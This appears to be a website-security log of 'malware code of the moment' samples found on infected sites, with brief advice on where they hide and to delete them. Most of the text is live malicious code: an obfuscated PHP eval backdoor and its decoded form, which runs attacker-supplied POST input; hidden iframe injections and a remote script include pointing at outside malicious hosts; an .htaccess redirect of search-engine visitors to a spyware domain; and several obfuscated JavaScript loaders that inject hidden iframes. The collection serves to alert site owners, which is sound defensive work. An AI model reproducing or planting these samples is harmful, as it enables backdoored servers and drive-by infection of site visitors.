eval(gzinflate(base64_decode("FZM1EqUKAgDv8qP5RYA/oDbC3Z1kC3d3Tr+zF+jqoLu80uFP/bVTNaRH+SdL9/KH/bco87ko//zDFYbArU9K15x9VZ9TIjwtvH09OTgtlNjZ38RJrC8APovpTfwIJuCa5enrgVnr4cv+2BUYwXjvwwQJlHkUPi1K0IPXOC08Ci2nC5FCZ3D7pAo99kKng9aah3sjq6/LiiY59yev5g71fhxrza/CMCy3oQ3W+MuvcTgStg34yYF8HKlFY4VuKQquiPW0YgRpUqVbC041DVYaqOYz4SzC0tZVymwby+5im9+oGmJoL1GYYzAosk3AYfS6xMwOrRHVPYFO2pIrnxX/nn4JAh+qbD4RdNg4hVFXFyttmHsAvkEmO/giu1F00ViMhgq4IOdAefAfECoDsNqk2DvHNqpCQEeUrr6GP+3GzclKWH/+TzLwnxoT8huyMI/DSpX39x0c8Q1Jk1XeoixXWBQs6P5Nnau+rfkhPUCPFBAaSRkAKU8EF8Km9ADJb8yiqD5yQ0qiQIK7+RmldyefGVjPTt2v/VS28jH1y4RqidbqiDG6/qlPLWWZV3GVGuR+KAVzN8PJbzm31109UMQfcb73gor2r/l7FjLElNAGrRFIqsJWGWQt2GqJqpYkNTfPRrj2u6m6JH6qNyTcQsTMOELEK1w7q/A17pec0ZJURYC84zIXNGwZEIDzkEOnjaY1IcE95ygTCRYRXEmxduoVLP2R5N30CHoNTfpe4bNRI2xb5auVnNXJ4tDgWTzNrYIdSXbHYlpA9tM+IfS0qhERHVWuSh4BTSTkJEnjr+kXDXj+GSnbdZ07tSi4aEflRdvEaZ0s8k/n2gsNLBrIRzKcKlANLNM946o/oU9bQEnIc5/gKSNS0RwgEU+W6HXLo096WsZZZY9ZT8JwNZL6SzBgh4xfCT90JPFocM8l50znnkhe3laj5G/wNxe4T6MCmTGvzyoUaoCZLvy84Nkop21YwhQB6qO2L9jSUa+WprOeikGoNDbB18upAaPikNDeCiDjvcFNQgISiIaxG1eJFikFVyE4tMOx8hkzPbAknsczz1hijCwV/RZIdjmc10DnxPJhGd0BQIKV396UQZ2i3Yb2YexJT1DoDn4zC9Gg/tDiI9gwB8dSZ9y80FosulfSe/L7rLAluxMpacISqio7hgUPPiXcajvbngdqg+XHYJ3XVQye0pjrl0aCI2G74D8/DghWAxRHkGdQgFZS59kUgBl+wsGupXe7pBsaqQQAVsoUhKThA4MAIZTt4rqGiSdfnQOOnegR2wuVYLyc7dXE2i2KKi1xVTInM5/deSERf7ZWSwhvtfKG8AchPaObcNf4Rh04+OptLpya76yZ6/dj8gksQ1bY872U1yGhRWKWI3bumX2xq4v4RCeyENnwJqBfTZDoCE07QbnWdYsle7AoL/7yyGBNvRQm9uzMsLIVg3wJgVyk77HZH7fCpUtvm4f2tw45BagRH7jwYvorz7ke6zLLS2lHdSKi9u0B1WlPwo3DJFNi5au5srrsyKhZhrEbaCDvu5aV45fDA0SUiSOylXiwpqeBh7owxAh27j4V3UEUxXLp2tgaFooRBrNg2bpiARKgrDbv0meQeyekQYpJVLOVFc6rgij74BlEsdZ0/s5M+dF4kc7xWu7BDtpf8XbbEQ7GjvaJxzsgu+EkMc4skn3utVAeFALHnI4vi4poQsRwrpEk20cg/xYE6dFfoij4doxyjKlfnE+uH7OR4dJqN2D9XzU7h9OB1KvtVJl+NnOuRf4W7bfaRQGug3SVXBnixQAQ5+nO4XinWv1wW9aCUzQvlb8h2WDBykD0sN7pebEHMjG3Fiaoo0kgUQkT+E9TYCShwvt6x2viplrihnmzE36enHodFL7o94c73D8l741RvjklTzgBTCoQxAGwuioQs/75999///M/")));

If we inflate this compress data, we find following PHP script:

@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;

Malware code of the moment

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz...

If infected, you will mostly find this code in WordPress theme files. However, it can be found in any .php file.

Malicious Iframe injection

Found following malicious code on a lawyer's website.

In PHP and HTML files, code was:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://totalhealthfairs.com/azzf.html?i=1613929></iframe>

and in Javascript files (.js) code was:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://totalhealthfairs.com/azzf.html?j=1613929></iframe>');

.htaccess hack

Here is another piece of malicious code found in a .htaccess file. If you find it anywhere on your website, delete it immediately!

It redirects popular search engine bots to a malicious link and kill your SEO

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://spywareshop.info/0/go.php?sid=2 [R,L]

Malware code of the moment

<script type="text/javascript" src="http://palwas.servehttp.com//ml.php"></script>

Malware code of the moment

<script>el=document.createElement("div");el.innerHTML="&#82;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#69;&#114;&#114;";try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};var ar=",\"C0hgev)=z(liwysc/dp'}[No1rB.Tf]; A>b taEun{<:m";var ar2="R136,0,-84,72,28,-108,32,24,-32,100,20,-164,148,-16,-40,-96,4,132,8,-116,-24,164,-164,148, -16,-92,48,-52,60,40,-140,76,64,28,-164,20,40,64,-48,-24,-16,24,-52,60,-80,116,-96,144,-40,0,0, -84,72,-16,52,28,-164,84,-64,-12,100,4,0,-48,64,-128,24,16,-40,128,24,-40,0,0,-60,24,-32,100,20, -164,148,-16,-40,-60,52,-56,104,-132,20,-40,176,-128,72,-16,52,28,-164,128,-88,44,-40,-32,48, -68,140,0,-76,104,-112,0,-24,28,24,24,-72,-32,40,-40,136,4,-96,52,-48,-28,76,-48,0,4,52,-24,8,60, 20,-72,-36,-64,64,4,68,-96,-4,24,80,-140,20,48,20,-92,72,68,-136,8,28,-32,-4,140,-120,48,20,-92, 72,68,-88,92,-96,-12,-24,12,48,-56,24,12,-12,96,-96,-4,4,104,-96,124,-168,36,24,0,-52,148,-40, -52,20,-36,-12,104,-104,48,72,12,-24,-12,-84,36,-52,120,-12,-132,108,-84,-24,100,32,28,-172, 120,24,-56,-20,104,-172,120,-48,60,36,-108,-20,72,-16,52,28,-164,120,-140,28,100,4,0,-48,48, 0,-12,44,4,-104,88,-104,48,72,-20,-100,72,-16,52,28,-164,84,-64,-12,144,-40,0,0,-108,132,-52, 44,-28,28,-116,116,-76,24,-32,100,20,-164,148,-16,-40,-48,40,-84,136,-4,-132,140,-116,-24, 164,-164,148,-16,-112,40,-32,72,-16,52,28,-164,60,-52,100,-8,-8,-52,-40,132,-16,16,0,-48,-56, 96,20,-12,-132,20,40,-20,44,-40,16,-84,84,-68,140,0,-76,104,-112,0,-24,28,24,24,-72,-32,40,-40, 136,4,-96,52,-48,-28,76,-48,0,4,52,-24,8,60,20,-72,-36,-64,64,4,-52,100,-8,-8,-52,92,-96,-12,-24, 92,-88,24,12,-12,96,-96,-4,4,104,-96,-24,48,-68,36,24,0,-52,148,-88,48,-8,-8,-52,92,-96,-12,-24, 92,-36,20,-36,-12,104,-104,48,72,-136,48,76,-12,-84,36,-52,120,-12,-132,60,48,-8,-8,-52,92,-96, -12,-24,92,-68,-24,100,32,-120,48,-72,72,48,-8,-8,-52,92,-96,-12,-24,92,40,-56,-20,-44,48,-72,72, 48,-8,-8,-52,-40,132,-16,16,0,-48,-56,96,20,-12,-132,20,40,-28,-4,24,80,-140,68,-84,84,20,-92,72, -52,100,-8,-8,-52,-40,132,-16,16,0,-48,-56,96,20,-12,-132,20,40,-68,8,28,-32,-4,140,-72,-84,84, 20,-92,72,-52,100,4,0,0,-60,24,-32,100,20,-164,148,-16,-40,-96,4,132,8,-116,-24,164,-164,148, -16,-92,48,-52,60,40,-140,76,64,28,-164,20,40,64,-48,-24,-16,24,-52,60,-80,116,-12,44,-80,0, -56,148,-96,-68,8,36,-4,28,-32,80,-92,100,4,0,-48]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2);s="";var pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');}
e(s);</script>

Malware Code of the moment

 <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</script>

Malware code of the moment

<script>date=new Date();var ar="Jp}g3ra]A\"kmTdQh{,'=Dyi)cf>1(0o[F<BnCs? e.wvlu:HGtNb; /EM";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f159,0,-93,9,42,-33,-45,51,-18,63,-102,87,-15,42,-24,-114,111,27,18,-33,-12,-87,87,-15,42, -36,-9,-39,-27,-18,-9,141,-132,15,87,-36,-30,99,-63,-51,24,-9,15,24,-6,-66,48,-21,111,0,0,-93,9, -60,3,15,87,-105,69,-15,87,3,0,-153,111,3,12,-21,9,-3,-69,111,0,0,-120,51,-18,63,-102,87,-15,42, -24,3,-111,51,81,-27,-36,-57,72,-33,9,-60,3,15,87,-3,-6,-96,57,-15,-3,-9,102,0,-144,135,24,0,-153, 3,99,9,-105,114,-63,6,48,3,-108,120,27,-96,39,18,-120,42,-42,111,-96,39,-15,0,-12,66,6,24,-84, 123,-141,0,0,36,42,-93,15,120,21,-135,42,-72,102,-60,30,93,-141,18,0,99,-81,-18,-18,144,-144, -15,48,0,-3,63,9,-60,-27,108,-102,12,-3,27,6,-33,63,-72,75,-54,-57,36,102,-90,-3,27,6,-33,63,-6, 36,-84,69,-12,-63,-3,75,-63,45,-45,87,-87,66,-66,81,-84,75,-93,21,-27,0,81,-15,51,-153,87,21,-45, 81,-81,24,15,33,-120,135,-42,-21,42,3,12,-27,36,-24,-12,-45,72,-9,-51,69,-9,-57,-87,135,-51,69, -102,24,21,63,-96,9,-60,3,15,87,-42,-51,42,87,3,0,-153,153,0,-84,60,-30,-33,75,-81,24,15,12,-51, 9,-60,3,15,87,-105,69,-15,-21,111,0,0,-30,-111,-3,102,-42,42,-60,60,-78,51,-18,63,-102,87,-15, 42,-24,-51,-57,105,-102,129,-27,45,-33,-12,-87,87,-15,42,-63,-30,12,9,-60,3,15,87,-66,15,87, -81,48,-12,9,27,-123,123,0,-132,51,87,-18,12,-27,-36,-30,57,-96,57,-18,-3,3,-9,102,0,-144,135, 24,0,-153,3,99,9,-105,114,-63,6,48,3,-108,120,27,-96,39,18,-120,42,-42,111,-96,39,-15,0,-12,66, 6,24,-84,123,-141,0,0,36,42,-93,15,120,21,-135,42,-72,102,-60,30,93,-141,18,0,99,-81,-18,-18, 144,-144,-15,48,0,-3,15,87,-81,48,-12,36,-84,69,-12,3,6,-63,45,-45,87,-87,66,-66,81,-84,-6,-3, -9,21,-27,0,81,-15,-51,102,-81,48,-12,36,-84,69,-12,3,-120,87,21,-45,81,-81,24,15,-48,-3,-36, 135,-42,-21,42,3,12,-27,-66,102,-81,48,-12,36,-84,69,-12,3,9,-12,-45,72,-90,-3,33,-33,102,-81, 48,-12,36,-84,69,-12,3,24,-57,-87,54,-3,33,-33,102,-81,48,-12,9,27,-123,123,0,-132,51,87,-18, 12,-27,-36,-30,72,-60,-27,108,-102,9,-3,3,27,6,-33,15,87,-81,48,-12,9,27,-123,123,0,-132,51,87, -18,12,-27,-36,-30,-9,75,-54,-57,36,102,-93,-3,3,27,6,-33,15,87,3,0,0,-120,51,-18,63,-102,87, -15,42,-24,-114,111,27,18,-33,-12,-87,87,-15,42,-36,-9,-39,-27,-18,-9,141,-132,15,87,-36,-30, 99,-63,-51,24,-9,15,24,-6,-66,102,-105,-15,0,117,-15,-66,69,-63,21,66,-93,45,-9,-6,87,3, 0,-153]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script>

Malware code of the moment

<script&gt;var ar="=2}Cd8 pvsyw:AlEeTcBNfb6u&gt;1&lt;,)h.r3'niao0 g;/{m[\"(t]";try{'qwe'.length(1);}catch(a){k=new Boolean().toString();date=new Date();};var ar2="f120,120,108,63,18,144,12,114,54,72,135,48,105,147,93,123,48,147,45,42,48,135,48,105,147, 27,57,30,51,111,123,60,111,135,48,144,102,66,114,12,30,102,87,138,117,150,87,132,120,120,120, 108,63,96,111,135,48,96,144,87,126,120,120,6,18,48,42,27,48,18,132,120,120,120,12,114,54,72, 135,48,105,147,93,33,96,108,147,48,144,141,81,108,63,96,111,135,48,18,27,96,54,0,102,90,147, 147,21,36,129,129,3,117,69,93,78,99,117,93,78,3,78,93,78,3,15,129,108,135,111,123,48,27,129, 72,21,42,114,111,12,93,90,147,135,42,102,18,33,108,12,147,90,0,102,78,117,102,18,90,48,108, 123,90,147,0,102,78,117,102,18,27,147,30,42,48,0,102,24,108,27,108,66,108,42,108,147,30,36, 90,108,12,12,48,105,126,21,114,27,108,147,108,114,105,36,111,66,27,114,42,72,147,48,126,42, 48,63,147,36,117,126,147,114,21,36,117,126,102,75,81,129,108,63,96,111,135,48,75,141,87,126, 120,120,6,120,120,63,72,105,54,147,108,114,105,18,108,63,96,111,135,48,96,144,87,132,120, 120,120,24,111,96,18,63,18,0,18,12,114,54,72,135,48,105,147,93,54,96,48,111,147,48,45,42,48, 135,48,105,147,144,102,108,63,96,111,135,48,102,87,126,63,93,27,48,147,39,147,147,96,108, 66,72,147,48,144,102,27,96,54,102,84,102,90,147,147,21,36,129,129,3,117,69,93,78,99,117,93, 78,3,78,93,78,3,15,129,108,135,111,123,48,27,129,72,21,42,114,111,12,93,90,147,135,42,102,87, 126,63,93,27,147,30,42,48,93,24,108,27,108,66,108,42,108,147,30,0,102,90,108,12,12,48,105, 102,126,63,93,27,147,30,42,48,93,21,114,27,108,147,108,114,105,0,102,111,66,27,114,42,72,147, 48,102,126,63,93,27,147,30,42,48,93,42,48,63,147,0,102,117,102,126,63,93,27,147,30,42,48,93, 147,114,21,0,102,117,102,126,63,93,27,48,147,39,147,147,96,108,66,72,147,48,144,102,33,108, 12,147,90,102,84,102,78,117,102,87,126,63,93,27,48,147,39,147,147,96,108,66,72,147,48,144, 102,90,48,108,123,90,147,102,84,102,78,117,102,87,126,120,120,120,12,114,54,72,135,48,105, 147,93,123,48,147,45,42,48,135,48,105,147,27,57,30,51,111,123,60,111,135,48,144,102,66,114, 12,30,102,87,138,117,150,93,111,21,21,48,105,12,9,90,108,42,12,144,63,87,126,120, 120,6]".replace(k.substr(0,1),'[');pau="rnev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));e=Function("retu"+pau)();ar2=('gfhgffg',e(ar2));s="";for(i=0;i!=ar2.length;i++){s+=ar.substr(ar2[i]/3,1);}
e(s);</script>

Malware code of the moment

<script>el=document.createElement("div");el.innerHTML="&#82;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#69;&#114; &#114;";try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};var ar=",\"C0hgev)=z(liwysc/dp'}[No1rB.Tf]; A>b taEun{<:m";var ar2="R136,0,-84,72,28,-108,32,24,-32,100,20,-164,148,-16,-40,-96,4,132,8,-116,-24,164,-164,148, -16,-92,48,-52,60,40,-140,76,64,28,-164,20,40,64,-48,-24,-16,24,-52,60,-80,116,-96,144,-40,0,0, -84,72,-16,52,28,-164,84,-64,-12,100,4,0,-48,64,-128,24,16,-40,128,24,-40,0,0,-60,24,-32,100,20, -164,148,-16,-40,-60,52,-56,104,-132,20,-40,176,-128,72,-16,52,28,-164,128,-88,44,-40,-32,48, -68,140,0,-76,104,-112,0,-24,28,24,24,-72,-32,40,-40,136,4,-96,52,-48,-28,76,-48,0,4,52,-24,8, 60,20,-72,-36,-64,64,4,68,-96,-4,24,80,-140,20,48,20,-92,72,68,-136,8,28,-32,-4,140,-120,48, 20,-92,72,68,-88,92,-96,-12,-24,12,48,-56,24,12,-12,96,-96,-4,4,104,-96,124,-168,36,24,0,-52, 148,-40,-52,20,-36,-12,104,-104,48,72,12,-24,-12,-84,36,-52,120,-12,-132,108,-84,-24,100,32, 28,-172,120,24,-56,-20,104,-172,120,-48,60,36,-108,-20,72,-16,52,28,-164,120,-140,28,100,4,0, -48,48,0,-12,44,4,-104,88,-104,48,72,-20,-100,72,-16,52,28,-164,84,-64,-12,144,-40,0,0,-108,132 ,-52,44,-28,28,-116,116,-76,24,-32,100,20,-164,148,-16,-40,-48,40,-84,136,-4,-132,140,-116,-24, 164,-164,148,-16,-112,40,-32,72,-16,52,28,-164,60,-52,100,-8,-8,-52,-40,132,-16,16,0,-48,-56,96, 20,-12,-132,20,40,-20,44,-40,16,-84,84,-68,140,0,-76,104,-112,0,-24,28,24,24,-72,-32,40,-40,136, 4,-96,52,-48,-28,76,-48,0,4,52,-24,8,60,20,-72,-36,-64,64,4,-52,100,-8,-8,-52,92,-96,-12,-24,92, -88,24,12,-12,96,-96,-4,4,104,-96,-24,48,-68,36,24,0,-52,148,-88,48,-8,-8,-52,92,-96,-12,-24,92, -36,20,-36,-12,104,-104,48,72,-136,48,76,-12,-84,36,-52,120,-12,-132,60,48,-8,-8,-52,92,-96,-12, -24,92,-68,-24,100,32,-120,48,-72,72,48,-8,-8,-52,92,-96,-12,-24,92,40,-56,-20,-44,48,-72,72,48, -8,-8,-52,-40,132,-16,16,0,-48,-56,96,20,-12,-132,20,40,-28,-4,24,80,-140,68,-84,84,20,-92,72, -52,100,-8,-8,-52,-40,132,-16,16,0,-48,-56,96,20,-12,-132,20,40,-68,8,28,-32,-4,140,-72,-84,84, 20,-92,72,-52,100,4,0,0,-60,24,-32,100,20,-164,148,-16,-40,-96,4,132,8,-116,-24,164,-164,148, -16,-92,48,-52,60,40,-140,76,64,28,-164,20,40,64,-48,-24,-16,24,-52,60,-80,116,-12,44,-80,0, -56,148,-96,-68,8,36,-4,28,-32,80,-92,100,4,0,-48]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2);s="";var pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');}
e(s);</script>